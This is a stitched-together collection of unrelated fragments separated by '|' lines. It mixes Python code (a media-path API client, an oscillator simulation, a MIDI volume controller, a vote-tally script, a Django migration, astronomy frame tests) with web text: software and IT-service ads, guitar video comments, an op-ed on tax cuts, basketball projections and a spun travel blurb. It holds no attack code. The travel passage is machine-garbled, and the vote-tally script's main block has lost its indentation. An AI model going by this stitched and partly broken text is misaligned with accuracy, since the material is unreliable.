        """POST this path to the movie or TV endpoint."""
        url = MEDIAVIEWER_MOVIE_PATH_URL if useMovieURL else MEDIAVIEWER_TV_PATH_URL
        payload = {
            'localpath': self.localpath,
            'remotepath': self.remotepath,
            'skip': False,
            'server': SERVER_NAME,
        }
        postData(payload, url)

    def postMovie(self):
        """Register this path as a movie path on the server."""
        self._post(useMovieURL=True)

    def postTVShow(self):
        """Register this path as a TV-show path on the server."""
        self._post(useMovieURL=False)

    @classmethod
    def _getPaths(cls, getMovies=False):
        """Return {localpath: {pk, ...}} for every path known to the server,
        following the paginated 'next' links until exhausted."""
        results_by_path = dict()
        next_url = MEDIAVIEWER_MOVIE_PATH_URL if getMovies else MEDIAVIEWER_TV_PATH_URL
        while next_url:
            response = requests.get(next_url,
                                    verify=VERIFY_REQUESTS,
                                    auth=(WAITER_USERNAME, WAITER_PASSWORD))
            response.raise_for_status()
            page = response.json()
            for record in page['results'] or ():
                results_by_path.setdefault(record['localpath'], set()).add(record['pk'])
            next_url = page['next']
        return results_by_path

    @classmethod
    def getTVPaths(cls):
        return cls._getPaths(getMovies=False)

    @classmethod
    def getMoviePaths(cls):
        return cls._getPaths(getMovies=True)

    @classmethod
    def _getLocalPaths(cls, getMovies=False):
        """Enumerate children of the configured local movie or TV directories."""
        roots = LOCAL_MOVIE_PATHS if getMovies else LOCAL_TV_SHOWS_PATHS
        return cls._buildLocalPaths(roots)

    @staticmethod
    def _buildLocalPaths(filepaths):
        """Return the set of immediate children of each existing root in
        *filepaths*; roots that do not exist are logged and skipped."""
        found = set()
        for root in filepaths:
            if not os.path.exists(root):
                log.error('{} does not exist. Continuing...'.format(root))
                continue
            found.update(os.path.join(root, entry) for entry in os.listdir(root) if entry)
        return found

    @classmethod
    def getLocalTVPaths(cls):
        return cls._getLocalPaths(getMovies=False)

    @classmethod
    def getLocalMoviePaths(cls):
        return cls._getLocalPaths(getMovies=True)

    @classmethod
    def _getAllPaths(cls, getMovies=False):
        ''' Returns a dict of localpaths related to pathids
            Local paths not in the server are represented with pathid -1.
        '''
        combined = cls._getPaths(getMovies=getMovies)
        for localpath in cls._getLocalPaths(getMovies=getMovies):
            combined.setdefault(localpath, set()).add(-1)
        return combined

    @classmethod
    def getAllTVPaths(cls):
        return cls._getAllPaths(getMovies=False)

    @classmethod
    def getAllMoviePaths(cls):
        return cls._getAllPaths(getMovies=True)

    @classmethod
    def _getPathByLocalPathAndRemotePath(cls,
                                         localpath,
                                         remotepath,
                                         useMovieURL=False,
                                         ):
        """Query the server for path records matching the local/remote pair."""
        url = MEDIAVIEWER_MOVIE_PATH_URL if useMovieURL else MEDIAVIEWER_TV_PATH_URL
        response = requests.get(url,
                                params={'localpath': localpath, 'remotepath': remotepath},
                                verify=VERIFY_REQUESTS,
                                auth=(WAITER_USERNAME, WAITER_PASSWORD))
        response.raise_for_status()
        return response.json()

    @classmethod
    def getTVPathByLocalPathAndRemotePath(cls, localpath, remotepath):
        return cls._getPathByLocalPathAndRemotePath(localpath,
                                                    remotepath,
                                                    useMovieURL=False)

    @classmethod
    def getMoviePathByLocalPathAndRemotePath(cls, localpath, remotepath):
        return cls._getPathByLocalPathAndRemotePath(localpath,
                                                    remotepath,
                                                    useMovieURL=True)
|
Error Repair Professional - Keep your PC operating smoothly by using Error Repair Professional to scan, identify, clean and repair errors in your PC with a single click. With a few easy steps, it will scan your entire registry for any invalid entries and provides a list of the registry errors found. You can then choose to selectively clean each item or automatically repair them all.
Error Repair Professional 4.23 is a shareware program and can be used as a demo to try the software until the free trial period has ended. A full version of the program is available after the trial period ends.
For security reasons, you should also check out the Error Repair Professional download at LO4D.com which includes virus and malware tests. Additional screenshots of this application download may be available, too.
Featuring the very best in free registry cleaner downloads. Editing staff adds reviews and free download links and constantly updates software.
Check out some of the freeware downloads available in the registry cleaner category. They contain no strings and are available at zero cost.
4 out of 5 based on 74 ratings.
|
#!/usr/bin/env python
# coding=utf-8
"""434. Rigid graphs
https://projecteuler.net/problem=434
Recall that a graph is a collection of vertices and edges connecting the
vertices, and that two vertices connected by an edge are called adjacent.
Graphs can be embedded in Euclidean space by associating each vertex with a
point in the Euclidean space.
A **flexible** graph is an embedding of a graph where it is possible to move
one or more vertices continuously so that the distance between at least two
nonadjacent vertices is altered while the distances between each pair of
adjacent vertices is kept constant.
A **rigid** graph is an embedding of a graph which is not flexible.
Informally, a graph is rigid if by replacing the vertices with fully rotating
hinges and the edges with rods that are unbending and inelastic, no parts of
the graph can be moved independently from the rest of the graph.
The **grid graphs** embedded in the Euclidean plane are not rigid, as the
following animation demonstrates:
However, one can make them rigid by adding diagonal edges to the cells. For
example, for the 2x3 grid graph, there are 19 ways to make the graph rigid:
Note that for the purposes of this problem, we do not consider changing the
orientation of a diagonal edge or adding both diagonal edges to a cell as a
different way of making a grid graph rigid.
Let R(m,n) be the number of ways to make the m × n grid graph rigid.
E.g. R(2,3) = 19 and R(5,5) = 23679901
Define S(N) as ∑R(i,j) for 1 ≤ i, j ≤ N.
E.g. S(5) = 25021721.
Find S(100), give your answer modulo 1000000033
"""
|
LAGA presents our sheet music edition of Pavane, Op. 50 by Gabriel Fauré arranged for classical guitar by Emre Sabuncuoglu.
incredible hands! Does anyone know the name the of this unique guitarist?
What is the tuning of the guitar?
this holding device you guys use.
that was ab so lute ly gorgeous. Thank you indeed.
to communicate the piece must have been a monumental task. KUDOS!!
One of the best players I’ve seen and I know all the major players from Segovia on. Brilliant arr. I’ve worked on this with both guitar and flute and never thought anyone could do both the accomp. and melody. Great use of tone changes….excellent tempo choices.
Absolutely one of the most beautiful things I’ve heard. Though it kind of scares me that this is only ranked as advanced!
OMG how beautiful that is! My eyes are filled with tears of emotion. It’s been a few years since I played, but this settles it – I’ve got to pick it up again!
I recently purchased your fine arrangement of, “Pavane,” and instantly began memorizing it with the great assist of your clear mastery of classical guitar. I actually learn just by watching you play, which makes your videos as invaluable to me as your arrangements. Thank you!
|
from pylab import *
from scipy import sparse
from scipy.integrate import odeint
import os, time
from osc_eqn import osc2
from my_parameters import *
# Frequency detuning constant (currently unused below -- kept for reference).
detune=0.001
# Base alpha parameter; each oscillator gets a small random perturbation and
# the reciprocal is taken (osc2 presumably expects 1/alpha -- TODO confirm).
alpha0=3.08
alpha1=1e-3*random(Nosc)+alpha0
alpha1=1.0/(alpha1)
# End times for the recorded run and the transient (Nosc, length, translength,
# stepsize come from my_parameters).
length1=length*stepsize+1
tlength=translength*stepsize+1
# Coupling topology: S1[i,j] is the coupling strength from oscillator j to i.
S1=zeros((Nosc,Nosc))
S1[0,5]=S1[1,4]=S1[2,3]=0.8
S1[3,0]=S1[3,1]=S1[4,0]=S1[4,2]=S1[5,1]=S1[5,2]=0.4
#for i in range(0,Nosc-1):
#    S1[i,i+1]=0.2
#S1[Nosc-1,0]=0.8
print S1
# Sparse form of the coupling matrix, passed to the ODE right-hand side.
S=sparse.csr_matrix(S1)
#ic1=[]
#for line in file('fc0.txt'):
#    ic1.append(double(line))
# Parameter sweep over coupling strength (single value here; ranges kept in
# the comments for reference).
for coupling in [0.11]:#arange(0.11,0.115,0.001): #[0.09]:
    try: os.mkdir('Data')
    except: pass
    #arange(3.535,3.55,0.001):
    for beta in [3.5]:
        # Per-oscillator beta with a small random spread, then reciprocal.
        beta1=1e-3*random(Nosc)+beta
        beta1=1.0/(beta1)
        outname='a%2.3f_b%2.3f_c%2.3f'%(alpha0,beta,coupling)
        print 'running params %s'%outname
        #set initial conditions
        #x=ic1
        # State vector layout: Nosc positions, Nosc velocities, Nosc auxiliary
        # variables, each initialised with alternating signs plus small noise.
        x=[]
        for n in range(0, Nosc):
            x.append(0.01*rand()+(-1)**(n+1)*3)
        for n in range(0, Nosc):
            x.append((-1)**(n+1)*0.3)
        for n in range(0, Nosc):
            x.append((-1)**(n+1)*1.0)
        x=array(x)
        time0=time.time()
        ##transient
        # Integrate the transient first, save it, and restart the recorded run
        # from the transient's final state.
        timepoints = arange(1., tlength, stepsize)
        transient = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
        tran3=reshape(transient,(translength,Nosc*3))
        savetxt('data_transient.txt',tran3)
        x=transient[-1,:]
        time1=time.time()
        timepoints = arange(1., length1, stepsize)
        trajectory = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
        time2=time.time()
        x=trajectory[-1,:]
        print "Solved in %e seconds (%e transient + %e printed)" % (time2-time0,time1-time0,time2-time1)
        # Quick-look plot of the first coordinate; final state saved to fc.txt
        # so a later run can restart from it.
        plot(trajectory[:,0])
        savefig('traj.png')
        savetxt('fc.txt',trajectory[-1,:])
        traj3=reshape(trajectory,(length,Nosc*3))
        savetxt('data_trajectory.txt',traj3)
#end
|
We are a company with 20 years experience providing technical requirements to businesses in London, Vauxhall, SW8. Our engineers are technology enthusiasts, fully trained and qualified, who have a passion for new and old technologies. We specialise in planning strategies to implement suitable IT solutions for your business using industry standards and procedures.
I had some serious issues with my laptop which were fixed in excellent time for a very reasonable price thanks to Kevin at Reboot That. Fantastic service!
Kevin is a true professional. He was very patient explaining all the new features on the computer to me, and gave me great advice on how to build a useful database.
|
import sys
import time
from subprocess import call
import pygame.midi
class NircmdMixer():
    """
    System master-volume mixer backed by the ``nircmd`` command-line tool
    (Windows).  Volumes are given on a 0-100 scale and converted to
    nircmd's native [0, 65535] range before being applied.
    """
    def __init__(self):
        # Last 0-100 volume actually applied; used to skip redundant calls.
        self.current_volume = 0
    def volume_to_int(self, volume):
        """
        Convert a 0-100 volume value to nircmd's [0, 65535] range.
        Returns 0 for any value that cannot be converted (best effort,
        mirroring the tool's forgiving CLI behaviour).
        """
        try:
            return int(65535 * volume / 100)
        except (TypeError, ValueError):
            # Narrowed from a blanket Exception: only conversion errors
            # are expected here.
            return 0
    def setvolume(self, vol, verbose=False):
        """
        Apply *vol* (0-100) as the system master volume via nircmd.
        No-op when *vol* equals the last volume that was set.
        """
        if vol != self.current_volume:
            volume = self.volume_to_int(vol)
            call(["nircmd", "setsysvolume", str(volume)])
            self.current_volume = vol
            if verbose:
                # Parenthesized print works under both Python 2 and 3.
                print('Midivol: Volume set to {}'.format(self.current_volume))
class Midivol():
    '''
    Class used to control master volume mixer (using nircmd) from midi input (pygame.midi) on windows systems
    '''
    # Shared mixer instance used to apply volume changes to the system.
    system_mixer = NircmdMixer()
    tag ='Midivol: '
    def __init__(self, device='', max_volume=50, channel=None, control=None, verbose=False):
        # device: a device index (int or int-like string) or '' for auto-detect.
        self.device = device
        # Upper bound (0-99) applied to any volume derived from MIDI input.
        self.max_volume = max_volume
        # Optional filters: only messages on this channel / control id are used.
        self.channel = channel
        self.control = control
        self.verbose = verbose
        self.inputs = pygame.midi
        self.inputs.init()
        # Snapshot of all MIDI devices, taken once at construction time.
        self.devices = self.get_device_list()
        self.stop_listening = False
    def build(self):
        '''
        Finalize midivol: resolve the MIDI input device and the message
        filters.  The listening loop itself is started by run().
        '''
        if not self.device:
            if self.inputs.get_count() == 0:
                raise Exception('No available MIDI devices')
            else:
                # Auto-select the first device flagged as an input.
                for d in self.devices:
                    if d[2] == 1: #input
                        self.device = self.devices.index(d)
                        break
        else:
            try:
                self.device = int(self.device)
            except ValueError:
                raise Exception("Incorrect device parameter")
        if self.device < len(self.devices):
            # list of gates functions attribute to determine
            # if msg should be passed (processed volume change)
            self.funky_list = []
            if self.channel != None:
                self.funky_list.append(self.channel_gates)
            if self.control != None:
                self.funky_list.append(self.control_gates)
            self.listening_input = self.inputs.Input(self.device, 0)
            self.log_msg('Running using MIDI device: {}, max_vol: {}, filters: channel {} control {}'.format(
                self.devices[self.device][1], self.max_volume, self.channel, self.control))
        else:
            raise Exception('"{}" input device not found'.format(self.device))
    def run(self):
        # main loop for MIDI msg listening; polls the device every ~5 ms.
        while True:
            if self.listening_input.poll():
                msg = self.listening_input.read(1)
                self.set_volume_from_midi_msg(msg)
                if self.verbose:
                    self.log_msg(msg)
            time.sleep(0.005)
    def assign_device_by_name(self,name):
        # Resolve a device name to its index; only input devices qualify.
        # Returns True on success, False when no matching input device exists.
        for dev in xrange(0, self.inputs.get_count()):
            dev_info = self.inputs.get_device_info(dev)
            if name == dev_info[1] and dev_info[2] == 1:
                self.device = dev
                return True
        # devices.append(self.inputs.get_device_info(dev))
        return False
    def get_device_list(self):
        # List of pygame.midi device-info tuples for every device.
        devices = []
        for dev in xrange(0, self.inputs.get_count()):
            devices.append(self.inputs.get_device_info(dev))
        return devices
    def set_volume(self, val): #dev
        '''
        Sets volume of self.system_mixer
        '''
        # Clamp to the configured maximum before applying.
        if val > self.max_volume:
            val = self.max_volume
        self.system_mixer.setvolume(val)
    def channel_gates(self, msg):
        '''
        Msg passes gates if channel is as needed
        '''
        # msg layout is [[[status, data1, data2, ...], timestamp]];
        # byte 0 carries the channel/status.
        return self.channel == msg[0][0][0]
    def control_gates(self, msg):
        '''
        Msg passes gates if control id is as needed
        '''
        return self.control == msg[0][0][1]
    def set_volume_from_midi_msg(self, msg):
        '''
        Set volume for main mixer from mido midi msg object
        '''
        # All configured gate functions must accept the message,
        # otherwise it is ignored.
        for funk in self.funky_list:
            if not funk(msg):
                return
        val = self.midi_to_volume(msg[0][0][2])
        self.set_volume(val)
    def log_msg(self, msg):
        '''
        Log msg with tag to console
        '''
        print '{} {}'.format(self.tag, str(msg))
    def midi_to_volume(self, value):
        '''
        Convert midi 0-127 values to 0-99 volume values
        '''
        volume = 0
        try:
            volume = int(value // 1.28)
        except Exception:
            # NOTE(review): prints the Exception class, not the caught
            # instance -- likely a leftover debug statement; confirm intent.
            print Exception
        return volume
def assign_param(argv, param_name, param_value, convert_to_int=False):
    '''
    Return the value following *param_name* in *argv*.

    When the flag is absent, or present with no value after it, the
    supplied *param_value* is returned unchanged.  With *convert_to_int*
    the fetched value is converted to int when possible and otherwise
    left as the raw string.
    '''
    if param_name not in argv:
        return param_value
    value_pos = argv.index(param_name) + 1
    if value_pos >= len(argv):
        # Flag was the last token -- nothing follows it.
        return param_value
    result = argv[value_pos]
    if convert_to_int:
        try:
            result = int(result)
        except ValueError:
            pass
    return result
def display_help():
    '''
    Print usage information for the command-line parameters to the
    console, then exit the process (via quit(), i.e. SystemExit).
    '''
    help_content = []
    help_content.append('----------------------------------------------\n')
    help_content.append('Control system volume tool using MIDI messages\n')
    help_content.append(' Available parameters:\n')
    help_content.append(' -h Display help info\n')
    help_content.append(' -d MIDI device name or id (default first available MIDI device)\n')
    help_content.append(' Can be integer value, which means # of available midi devices\n')
    help_content.append(' -l Returns list of all available MIDI devices\n')
    help_content.append(' -ch MIDI channel listen to 0-15 (default all)\n')
    help_content.append(' -ct MIDI control id to process, type int (default all ids)\n')
    help_content.append(' -m Max volume threshold 0-99 (default 30)\n')
    help_content.append(' -v Run in verbose mode\n')
    # Parenthesized print works under both Python 2 and 3 (the original
    # py2-only print statement is a syntax error under Python 3).
    print(''.join(help_content))
    quit()
def display_devices():
    '''
    Print every MIDI device visible to pygame.midi, then exit the
    process.  Each entry is an (interf, name, input, output, opened)
    tuple as returned by pygame.midi.get_device_info().
    '''
    midi = pygame.midi
    midi.init()
    # Parenthesized print and range() work under both Python 2 and 3
    # (the original used py2-only print statements and xrange).
    print('List of available MIDI devices:')
    print('(interf, name, input, output, opened)')
    for dev in range(0, midi.get_count()):
        print(midi.get_device_info(dev))
    quit()
def assign_params(midivol):
    '''
    Populate *midivol* attributes from the flags present in sys.argv.

    The -h and -l flags short-circuit into the help text / device
    listing respectively (both of which exit the process).
    '''
    if '-h' in sys.argv:
        display_help()
    if '-l' in sys.argv:
        display_devices()
    # Flag-to-attribute mapping; channel, control and max volume are
    # converted to int when possible.
    midivol.device = assign_param(sys.argv, '-d', midivol.device)
    midivol.channel = assign_param(sys.argv, '-ch', midivol.channel, True)
    midivol.control = assign_param(sys.argv, '-ct', midivol.control, True)
    midivol.max_volume = assign_param(sys.argv, '-m', midivol.max_volume, True)
    if '-v' in sys.argv:
        midivol.verbose = True
def main():
    '''
    Entry point: build a Midivol from the command-line arguments and
    start its MIDI listening loop.
    '''
    vol_controller = Midivol()
    assign_params(vol_controller)
    vol_controller.build()
    vol_controller.run()
if __name__ == "__main__":
    main()
|
Like a cold that you just can’t shake, supply-side economics enthusiasts just won’t go away.
At a Joint Economic Committee hearing last Wednesday, economist Arthur Laffer, who first sketched out what’s now known as the Laffer curve on a napkin over 40 years ago, once again laid out the argument that massive tax cuts benefiting the wealthy lead to broad economic growth that “trickles down” to everyone else and offsets the cost of the tax cuts. In other words, tax cuts pay for themselves.
History shows something else entirely: they don’t.
In fact, over the past several decades, economic growth has often been faster when the top marginal income tax rate has been higher, not lower. But that hasn’t stopped those who worship at the supply-side altar. In 1993, Laffer predicted that “[President Bill] Clinton’s tax bill will do about as much damage to the U.S. economy as could feasibly be done in the current political environment.” History, that stubborn annoyance, of course proved otherwise. The U.S. economy grew much stronger during the Clinton years—when marginal income tax rates were higher—than during the George W. Bush years.
This doesn’t mean that raising the top marginal tax rate creates growth and investment. However, it does mean that that lowering tax rates for the wealthy doesn’t automatically lead to faster growth and more investment, as the supply-side crowd claims.
Most recently, Dr. Laffer and his conservative friends have applied their theories to Kansas. In 2012, he promised that tax cuts would create “enormous prosperity” for the state. Instead, the results have been disastrous. Significant tax cuts in Kansas have dramatically reduced revenues and left the state without the resources to fund its educational system. Job and GDP growth have also been weak—Kansas’ annual job growth has only been about half that of its neighboring states since the Laffer-inspired tax cuts were enacted.
Apparently, some people think we never learn. The frontrunners for the Republican presidential nomination, Donald Trump and Ted Cruz, have each proposed enormous supply-side tax cuts. According to the Tax Policy Center, each of their plans would cost more than $10 trillion over 10 years in lost revenue and higher interest costs as a result of the increased debt created by those tax cuts. Meanwhile, they’d provide the average member of the top 0.1 percent a tax cut of well over $1 million per year.
It’s like we’re stuck in a movie theatre and they just keep showing the same horror film with the same terrible ending.
It is almost impossible for us to have meaningful tax reform, either incremental or transformative, until there is general acknowledgement that supply-side economics has not and does not work. It’s time to move beyond wishful thinking and focus on what has actually happened.
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division
import csv
import sys
from collections import Counter
def do_command(args):
    """
    Read the tab-separated vote file on *args.input* and write a 2x2
    win/loss summary table to *args.output*.

    A perspective "wins" a mention when it received at least half of the
    votes cast for that mention; the two outcomes are tallied
    independently, so a mention can count as a win for both, either, or
    neither perspective.
    """
    reader = csv.reader(args.input, delimiter="\t")
    writer = csv.writer(args.output, delimiter="\t")
    header = next(reader)
    expected = "id baseline_perspective generation_perspective baseline_votes generation_votes none_votes n_votes error_analysis".split()
    # BUG FIX: the original concatenated the list `header` directly to a
    # str, so a bad header raised TypeError instead of the intended
    # AssertionError message.
    assert header == expected, "invalid header: " + str(header)
    counter = Counter()
    for (id_, baseline_perspective, generation_perspective,
         baseline_votes, generation_votes, none_votes,
         n_votes, error_analysis) in reader:
        baseline_wins = int(baseline_votes) >= int(n_votes) / 2
        generation_wins = int(generation_votes) >= int(n_votes) / 2
        counter[baseline_wins, generation_wins] += 1
    writer.writerow(["baseline perspective is rated useful",
                     "generation perspective is rated useful",
                     "# Mentions"])
    # Emit all four win/loss combinations, including zero counts.
    for baseline_flag in [True, False]:
        for generation_flag in [True, False]:
            writer.writerow([baseline_flag, generation_flag,
                             counter[baseline_flag, generation_flag]])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser( description='' )
parser.add_argument('--input', type=argparse.FileType('r'), default=sys.stdin, help="")
parser.add_argument('--output', type=argparse.FileType('w'), default=sys.stdout, help="")
parser.set_defaults(func=do_command)
#subparsers = parser.add_subparsers()
#command_parser = subparsers.add_parser('command', help='' )
#command_parser.set_defaults(func=do_command)
ARGS = parser.parse_args()
ARGS.func(ARGS)
|
These are the latest Atlantic Sun Conference projections based on our NCAA College Basketball Ratings. These projections for the Atlantic Sun are based on actual results of previous games and our predicted results for games upcoming in the future. The rank (or seed) for each team is only based upon their projected finish in the conference. Our latest update to these projections was done on 3/17/2019.
Our full list of NCAA Tournament and NIT Tournament projections can be found here. The below list contains our latest NCAA Tournament projections for teams within the Atlantic Sun Conference. The “Bracket Rating” is based on a proprietary formula that projects a team’s bracket seeding by the NCAA Tournament committee.
Based on 100 simulations, this is the projected place where each team finishes in the Atlantic Sun Conference standings.
Below are the odds to advance to each stage of the Atlantic Sun Conference Tournament. The table below is based on 1,000 simulations. The top eight of nine teams in the Atlantic Sun Conference play in a standard eight-team tournament at the higher seed’s campus site.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-18 13:45
from __future__ import unicode_literals
import block.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 1.10.6: adds the Calendar and Map content
    # models plus their per-page-section block tables, wiring each content
    # row to the block app's edit/moderate state machinery.  Only comments
    # should be edited here; the schema operations must stay frozen.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('block', '0018_image_user'),
        ('compose', '0017_auto_20160205_1752'),
    ]

    operations = [
        # Content models (Calendar/Map) and their block containers.
        migrations.CreateModel(
            name='Calendar',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('date_moderated', models.DateTimeField(blank=True, null=True)),
                ('order', models.IntegerField()),
            ],
            options={
                'verbose_name_plural': 'Calendar',
                'verbose_name': 'Calendar',
            },
        ),
        migrations.CreateModel(
            name='CalendarBlock',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
            ],
            options={
                'verbose_name_plural': 'Blocks',
                'abstract': False,
                'verbose_name': 'Block',
            },
        ),
        migrations.CreateModel(
            name='Map',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('date_moderated', models.DateTimeField(blank=True, null=True)),
                ('order', models.IntegerField()),
            ],
            options={
                'verbose_name_plural': 'Map',
                'verbose_name': 'Map',
            },
        ),
        migrations.CreateModel(
            name='MapBlock',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
            ],
            options={
                'verbose_name_plural': 'Blocks',
                'abstract': False,
                'verbose_name': 'Block',
            },
        ),
        # Foreign keys added after model creation; the edit/moderate state
        # defaults come from helper callables in block.models.
        migrations.AddField(
            model_name='map',
            name='block',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.MapBlock'),
        ),
        migrations.AddField(
            model_name='map',
            name='edit_state',
            field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
        ),
        migrations.AddField(
            model_name='map',
            name='map',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='map', to='block.Link'),
        ),
        migrations.AddField(
            model_name='map',
            name='moderate_state',
            field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
        ),
        migrations.AddField(
            model_name='map',
            name='user_moderated',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='calendar',
            name='block',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.CalendarBlock'),
        ),
        migrations.AddField(
            model_name='calendar',
            name='calendar',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='calendar', to='block.Link'),
        ),
        migrations.AddField(
            model_name='calendar',
            name='edit_state',
            field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
        ),
        migrations.AddField(
            model_name='calendar',
            name='moderate_state',
            field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
        ),
        migrations.AddField(
            model_name='calendar',
            name='user_moderated',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        # One content row per (block, moderate_state) pair.
        migrations.AlterUniqueTogether(
            name='map',
            unique_together=set([('block', 'moderate_state')]),
        ),
        migrations.AlterUniqueTogether(
            name='calendar',
            unique_together=set([('block', 'moderate_state')]),
        ),
    ]
|
Just Cruisin’ Plus is a full-service travel agency, specializing in cruises and holidays. All inclusive vacation together with sports activities meals, drinks, and varied non-motorized water. This year are there much more non-stop discounted flights to Mexico so financial savings are wonderful! Chef Ricardo Muñoz Zurita hails from Mexico City the place he was named one of many high chefs in Mexico. Cancun by means of apple, because of go away on July 14th, hurricane was fastly approaching, (they didn’t have insurance coverage) APPLE TOLD THEM TO GO OR LOOSE YOUR CASH, WOULDN’T ALLOW THEM TO POSTPONE JOURNEY, advised apple agent could be at resort to assist them out should storm get unhealthy, and help them get out early!!!!!!!!!
|
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import (
CartesianRepresentation,
get_body_barycentric,
solar_system_ephemeris,
)
from astropy.tests.helper import assert_quantity_allclose
from astropy.time import Time
from poliastro.bodies import (
Earth,
Jupiter,
Mars,
Mercury,
Neptune,
Saturn,
Sun,
Uranus,
Venus,
)
from poliastro.constants import J2000
from poliastro.frames.ecliptic import GeocentricSolarEcliptic
from poliastro.frames.equatorial import (
GCRS,
HCRS,
ICRS,
JupiterICRS,
MarsICRS,
MercuryICRS,
NeptuneICRS,
SaturnICRS,
UranusICRS,
VenusICRS,
)
from poliastro.frames.fixed import (
ITRS,
JupiterFixed,
MarsFixed,
MercuryFixed,
NeptuneFixed,
SaturnFixed,
SunFixed,
UranusFixed,
VenusFixed,
)
@pytest.mark.parametrize(
    "body, frame",
    [
        (Mercury, MercuryICRS),
        (Venus, VenusICRS),
        (Mars, MarsICRS),
        (Jupiter, JupiterICRS),
        (Saturn, SaturnICRS),
        (Uranus, UranusICRS),
        (Neptune, NeptuneICRS),
    ],
)
def test_planetary_frames_have_proper_string_representations(body, frame):
    # Each body-centered frame should mention its body in its repr.
    frame_instance = frame()
    assert body.name in repr(frame_instance)
@pytest.mark.parametrize(
    "body, frame",
    [
        (Sun, HCRS),
        (Mercury, MercuryICRS),
        (Venus, VenusICRS),
        (Earth, GCRS),
        (Mars, MarsICRS),
        (Jupiter, JupiterICRS),
        (Saturn, SaturnICRS),
        (Uranus, UranusICRS),
        (Neptune, NeptuneICRS),
    ],
)
def test_planetary_icrs_frame_is_just_translation(body, frame):
    # A fixed offset vector expressed in the body-centered frame, converted
    # to ICRS, must equal the body's barycentric position plus that same
    # vector -- i.e. the body frame differs from ICRS by a pure translation.
    with solar_system_ephemeris.set("builtin"):
        epoch = J2000
        vector = CartesianRepresentation(x=100 * u.km, y=100 * u.km, z=100 * u.km)
        vector_result = (
            frame(vector, obstime=epoch)
            .transform_to(ICRS)
            .represent_as(CartesianRepresentation)
        )
        expected_result = get_body_barycentric(body.name, epoch) + vector
        assert_quantity_allclose(vector_result.xyz, expected_result.xyz)
@pytest.mark.parametrize(
    "body, frame",
    [
        (Sun, HCRS),
        (Mercury, MercuryICRS),
        (Venus, VenusICRS),
        (Earth, GCRS),
        (Mars, MarsICRS),
        (Jupiter, JupiterICRS),
        (Saturn, SaturnICRS),
        (Uranus, UranusICRS),
        (Neptune, NeptuneICRS),
    ],
)
def test_icrs_body_position_to_planetary_frame_yields_zeros(body, frame):
    # The body's own barycentric position, expressed in the body-centered
    # frame, must be the origin (within numerical tolerance).
    with solar_system_ephemeris.set("builtin"):
        epoch = J2000
        vector = get_body_barycentric(body.name, epoch)
        vector_result = (
            ICRS(vector)
            .transform_to(frame(obstime=epoch))
            .represent_as(CartesianRepresentation)
        )
        assert_quantity_allclose(vector_result.xyz, [0, 0, 0] * u.km, atol=1e-7 * u.km)
@pytest.mark.parametrize(
    "body, fixed_frame, inertial_frame",
    [
        (Sun, SunFixed, HCRS),
        (Mercury, MercuryFixed, MercuryICRS),
        (Venus, VenusFixed, VenusICRS),
        (Earth, ITRS, GCRS),
        (Mars, MarsFixed, MarsICRS),
        (Jupiter, JupiterFixed, JupiterICRS),
        (Saturn, SaturnFixed, SaturnICRS),
        (Uranus, UranusFixed, UranusICRS),
        (Neptune, NeptuneFixed, NeptuneICRS),
    ],
)
def test_planetary_fixed_inertial_conversion(body, fixed_frame, inertial_frame):
    # A point at distance R (the body's radius) in the body-fixed frame must
    # remain at distance R after transforming to the inertial frame: the
    # fixed<->inertial transformation is a rotation about the body center.
    with solar_system_ephemeris.set("builtin"):
        epoch = J2000
        fixed_position = fixed_frame(
            0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
        )
        inertial_position = fixed_position.transform_to(inertial_frame(obstime=epoch))
        assert_quantity_allclose(
            fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
        )
        assert_quantity_allclose(
            inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
        )
@pytest.mark.parametrize(
    "body, fixed_frame, inertial_frame",
    [
        (Sun, SunFixed, HCRS),
        (Mercury, MercuryFixed, MercuryICRS),
        (Venus, VenusFixed, VenusICRS),
